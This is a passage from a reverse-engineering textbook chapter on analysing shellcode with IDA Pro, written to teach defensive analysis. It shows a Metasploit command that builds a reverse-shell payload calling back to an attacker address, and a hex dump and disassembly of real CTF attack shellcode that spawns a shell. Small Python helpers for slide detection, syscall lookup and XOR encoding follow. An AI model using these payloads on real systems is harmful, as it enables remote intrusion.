The IDA Pro Book, 2nd Edition by Chris Eagle. Published by No Starch Press, 2011

Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive tool. Before we conclude, it might be nice to offer up at least one use for IDA as a defensive tool. As with any other binary code, there is only one way to determine what shellcode does, and that is to disassemble it. Of course, the first requirement is to get your hands on some shellcode. If you are the curious type and have always wondered how Metasploit payloads work, you might simply use Metasploit to generate a payload in raw form and then disassemble the resulting blob.

The following Metasploit command generates a payload that calls back to port 4444 (the payload’s default, since no LPORT is given) on the attacker’s computer and grants the attacker a shell on the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R > w32_reverse_4444

The resulting file contains the requested payload in its raw binary form. Because the file has no recognizable format, it must be opened in IDA as a binary file, and a disassembly is obtained by converting the displayed bytes into code.

Another place that shellcode can turn up is in network packet captures. Narrowing down exactly which packets contain shellcode can be a challenge, and you are invited to check out any of the vast number of books on network security that will be happy to tell you just how to find all those nasty packets. For now, consider the reassembled client stream of an attack observed on the Capture the Flag network at DEFCON 18:

00000000   AD 02 0E 08  01 00 00 00  47 43 4E 93  43 4B 91 90  ........GCN.CK..
00000010   92 47 4E 46  96 46 41 4A  43 4F 99 41  40 49 48 43  .GNF.FAJCO.A@IHC
00000020   4A 4E 4B 43  42 49 93 4B  4A 41 47 46  46 46 43 90  JNKCBI.KJAGFFFC.
00000030   4E 46 97 4A  43 90 42 91  46 90 4E 97  42 48 41 48  NF.JC.B.F.N.BHAH
00000040   97 93 48 97  93 42 40 4B  99 4A 6A 02  58 CD 80 09  ..H..B@K.Jj.X...
00000050   D2 75 06 6A  01 58 50 CD  80 33 C0 B4  10 2B E0 31  .u.j.XP..3...+.1
00000060   D2 52 89 E6  52 52 B2 80  52 B2 04 52  56 52 52 66  .R..RR..R..RVRRf
00000070   FF 46 E8 6A  1D 58 CD 80  81 3E 48 41  43 4B 75 EF  .F.j.X...>HACKu.
00000080   5A 5F 6A 02  59 6A 5A 58  99 51 57 51  CD 80 49 79  Z_j.YjZX.QWQ..Iy
00000090   F4 52 68 2F  2F 73 68 68  2F 62 69 6E  89 E3 50 54  .Rh//shh/bin..PT
000000A0   53 53 B0 3B  CD 80 41 41  49 47 41 93  97 97 4B 48  SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based on other data associated with this particular network connection, the binary data is assumed to be shellcode. Packet-analysis tools such as Wireshark[199] often possess the capability to extract TCP session content directly to a file. In the case of Wireshark, once you find a TCP session of interest, you can use the Follow TCP Stream command and then save the raw stream content to a file. The resulting file can then be loaded into IDA (using IDA’s binary loader) and analyzed further.

Often network attack sessions contain a mix of shellcode and application layer content. In order to properly disassemble the shellcode, you must correctly locate the first bytes of the attacker’s payload. The level of difficulty in doing this will vary from one attack to the next and one protocol to the next. In some cases, long NOP slides will be obvious (long sequences of 0x90 for x86 attacks), while in other cases (such as the current example), locating the NOPs, and therefore the shellcode, may be less obvious. The preceding hex dump, for example, actually contains a NOP slide; however, instead of actual x86 NOPs, it uses a randomly generated sequence of 1-byte instructions that have no effect on the shellcode that follows. Because an enormous number of permutations exist for such a NOP slide, the danger that a network intrusion detection system will recognize and alert on it is diminished. Finally, some knowledge of the application that is being attacked may help in distinguishing data elements meant for consumption by the application from shellcode meant to be executed.

In this case, with a little effort, IDA disassembles the preceding binary content as shown here:

   seg000:00000000           db 0ADh ; ¡
   seg000:00000001           db    2
   seg000:00000002           db  0Eh
   seg000:00000003           db    8
   seg000:00000004           db    1
   seg000:00000005           db    0
   seg000:00000006           db    0
   seg000:00000007           db    0
   seg000:00000008 ; --------------------------------------------------------------
   seg000:00000008           inc     edi
   seg000:00000009           inc     ebx
   seg000:0000000A           dec     esi
   ...             ; NOP slide and shellcode initialization omitted
   seg000:0000006D           push    edx
   seg000:0000006E           push    edx
   seg000:0000006F
   seg000:0000006F loc_6F:                   ; CODE XREF:  seg000:0000007E↓j
   seg000:0000006F           inc     word ptr [esi-18h]
   seg000:00000073           push    1Dh
   seg000:00000075           pop     eax
   seg000:00000076           int     80h     ; LINUX - sys_pause
   seg000:00000078           cmp     dword ptr [esi], 4B434148h
   seg000:0000007E           jnz     short loc_6F
   seg000:00000080           pop     edx
   seg000:00000081           pop     edi
   seg000:00000082           push    2
   seg000:00000084           pop     ecx
   seg000:00000085
   seg000:00000085 loc_85:                   ; CODE XREF:  seg000:0000008F↓j
   seg000:00000085           push    5Ah ; 'Z'
   seg000:00000087           pop     eax
   seg000:00000088           cdq
   seg000:00000089           push    ecx
   seg000:0000008A           push    edi
   seg000:0000008B           push    ecx
   seg000:0000008C           int     80h     ; LINUX - old_mmap
   seg000:0000008E           dec     ecx
   seg000:0000008F           jns     short loc_85
   seg000:00000091           push    edx
   seg000:00000092           push    'hs//'
   seg000:00000097           push    'nib/'
   ...             ; continues to invoke execve to spawn the shell
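
Locating a disguised NOP slide like the one in this stream can be partially automated. The following is a minimal Python sketch, not a method taken from IDA or from any intrusion detection system: it looks for the longest run of bytes drawn from a set of 1-byte 32-bit x86 instructions. The candidate set (`SLIDE_BYTES`) and the function name `find_longest_slide` are assumptions made for illustration; a real slide generator may use other opcodes.

```python
# Candidate 1-byte x86 (32-bit) instructions that a slide generator might emit.
# This set is an assumption for illustration, not an exhaustive list.
SLIDE_BYTES = frozenset(
    list(range(0x40, 0x50))    # inc r32 / dec r32
    + list(range(0x90, 0x9A))  # nop, xchg eax,r32, cwde, cdq
)


def find_longest_slide(data, candidates=SLIDE_BYTES):
    """Return (offset, length) of the longest run of candidate bytes in data."""
    best_start, best_len = 0, 0
    run_start = None
    for i, b in enumerate(data):
        if b in candidates:
            if run_start is None:
                run_start = i          # a new run begins here
            run_len = i - run_start + 1
            if run_len > best_len:
                best_start, best_len = run_start, run_len
        else:
            run_start = None           # run broken by a non-candidate byte
    return best_start, best_len


# First 0x50 bytes of the client stream, copied from the hex dump above.
STREAM_PREFIX = bytes.fromhex(
    "AD 02 0E 08 01 00 00 00 47 43 4E 93 43 4B 91 90 "
    "92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43 "
    "4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 "
    "4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48 "
    "97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09"
)

if __name__ == "__main__":
    offset, length = find_longest_slide(STREAM_PREFIX)
    print("slide at 0x%X, %d bytes, code resumes at 0x%X"
          % (offset, length, offset + length))
```

On this prefix the sketch reports a 66-byte run beginning at offset 8, immediately after the eight leading bytes left as data in the listing, and ending at 0x4A, where the bytes `6A 02` (push 2) begin. A run found this way is only a hint: ordinary ASCII text also falls partly within the 0x40 to 0x4F range, so the result still needs to be confirmed by disassembling from the reported offset.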

One point worth noting is that the first 8 bytes of the stream are actually protocol data, not shellcode, and thus we have chosen not to disassemble them. Also, IDA seems to have misidentified the system calls that are being made at 00000076 and 0000008C. We have not yet mentioned that this exploit was targeting a FreeBSD application, a fact that is helpful in decoding the system call numbers being used in the payload. Because IDA is only capable of annotating Linux system call numbers, we are left to do a little research to learn that FreeBSD system call 29 (1Dh) is actually recvfrom (rather than pause) and system call 90 (5Ah) is actually the dup2 function (rather than old_mmap).
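
The difference between the two operating systems can be captured in a small lookup table. The following Python sketch is illustrative only: the `SYSCALLS` dictionary and `syscall_name` helper are hypothetical names, and the tables are deliberately partial, listing only a few i386 system call numbers relevant to this payload. The Linux name for call 90 follows the annotation IDA produced in the listing.

```python
# Partial i386 system call tables, keyed by the value loaded into eax
# before "int 80h". Only a handful of entries are listed here; consult
# each kernel's own system call table for anything else.
SYSCALLS = {
    "linux": {1: "exit", 2: "fork", 11: "execve", 29: "pause", 90: "old_mmap"},
    "freebsd": {1: "exit", 2: "fork", 29: "recvfrom", 59: "execve", 90: "dup2"},
}


def syscall_name(number, target_os):
    """Return the system call name for number on target_os, or a placeholder."""
    return SYSCALLS[target_os].get(number, "unknown_%d" % number)


if __name__ == "__main__":
    # System call numbers used by the payload: 1Dh, 5Ah, and 3Bh.
    for number in (0x1D, 0x5A, 0x3B):
        print("%02Xh  linux=%-12s freebsd=%s" % (
            number,
            syscall_name(number, "linux"),
            syscall_name(number, "freebsd"),
        ))
```

The third number, 3Bh, comes from the bytes `B0 3B CD 80` near the end of the hex dump. On FreeBSD it is execve, which agrees with the closing comment in the listing.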

Because it lacks any header information useful to IDA, shellcode will generally require extra attention in order to be properly disassembled. In addition, shellcode encoders are frequently employed as a means of evading intrusion detection systems. Such encoders have an effect very much like the effect that obfuscation tools have on standard binaries, further complicating the shellcode-disassembly process.
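
To see why an encoder complicates disassembly, consider the simplest possible case. The Python sketch below applies a single-byte XOR to ten bytes of the payload shown earlier. This is a stand-in chosen for brevity, not a reproduction of any particular encoder; real encoders are generally more elaborate. The key value and the `xor_bytes` helper are assumptions for illustration.

```python
def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key (0-255)."""
    return bytes(b ^ key for b in data)


# Bytes 92h-9Bh of the hex dump above: push 'hs//' ; push 'nib/'
PLAIN = bytes.fromhex("68 2F 2F 73 68 68 2F 62 69 6E")

if __name__ == "__main__":
    key = 0x5A  # arbitrary key chosen for this illustration
    encoded = xor_bytes(PLAIN, key)
    print("plain  :", PLAIN.hex())
    print("encoded:", encoded.hex())
    # Applying the same XOR again restores the original bytes, which is
    # the job a decoder stub performs at run time before the payload runs.
    assert xor_bytes(encoded, key) == PLAIN
```

After encoding, neither the push opcodes nor the /bin//sh string remain visible, so a disassembly of the encoded bytes is meaningless until the decoding step has been understood and reversed.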